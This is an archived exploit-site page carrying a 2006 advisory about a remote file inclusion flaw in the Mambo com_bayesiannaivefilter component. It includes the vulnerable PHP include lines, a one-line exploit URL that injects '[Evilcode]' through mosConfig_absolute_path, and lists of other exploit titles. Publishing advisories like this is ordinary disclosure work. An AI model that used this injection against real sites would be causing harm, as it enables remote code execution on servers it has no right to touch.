exploits , vulnerabilities , articles , Mambo com_bayesiannaivefilter Component <= 1.1 Inclusion Vulnerability

2007-04-15 Mambo/Joomla Component Article 1.1 Remote File Inclusion Vulnerability
2007-04-12 Mambo Module Calendar (Agenda) 1.5.5 RFI Vulnerability
2007-04-12 Mambo Module Weather (absolute_path) RFI Vulnerability
2007-04-12 TOSMO/Mambo 1.4.13a (absolute_path) Remote File Inclusion Vulns
2007-04-12 Mambo Component zOOm Media Gallery <= 2.5 Beta 2 RFI Vulnerabilities
2007-04-11 Joomla/Mambo Component Taskhopper 1.1 RFI Vulnerabilities

2006-07-30

Mambo com_bayesiannaivefilter Component <= 1.1 Inclusion Vulnerability

Rated as : High Risk

#############################Pablin77 - XTech Inc
Group################################
#
# com_bayesiannaivefilter Mambo Component Remote File Inclusion
(mosConfig_absolute_path)
#
#################################################################################
#
# Discovered By Pablin77
#
#
# contact: Pablin_77 [at] Argentina [dot] com
#
#
#          Lebanon-Israel...STOP! No War!!!
#
#                     peace, that's all
#
#  This is a massive cyber-protest, we are :
#
#  eno7 | XTech Inc | byond crew | hackbsd crew | digitalmind
#
#
################################################################################
#
# Greetz: eno7 , Byond Crew
#
# Special Gretz:XTeh Inc (Status-x, Furtivo, sys7ech)
#
###############################################################################

code from lang.php

include_once($mosConfig_absolute_path.'/administrator/components/com_bayesiannaivefilter/languages/'.$mosConfig_lang.'.php');
  } else { 
   
include_once($mosConfig_absolute_path.'/administrator/components/com_bayesiannaivefilter/languages/english.php');
  }

Web:
http://forge.joomla.org/sf/scm/do/listRepositories/projects.com_bayesianspamfiltering/scm

exploit:
http://site.com/[path]/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=[Evilcode]

##############################MARY TE
AAAAAMOOOO!!!############################
###############################################################################
securitydot.net - 2006-07-30

Exploits - newest 10 RSS | More

2007-06-15 56640 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 33745 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 41887 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 28963 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19481 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16472 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19133 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16338 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33251 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 16996 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit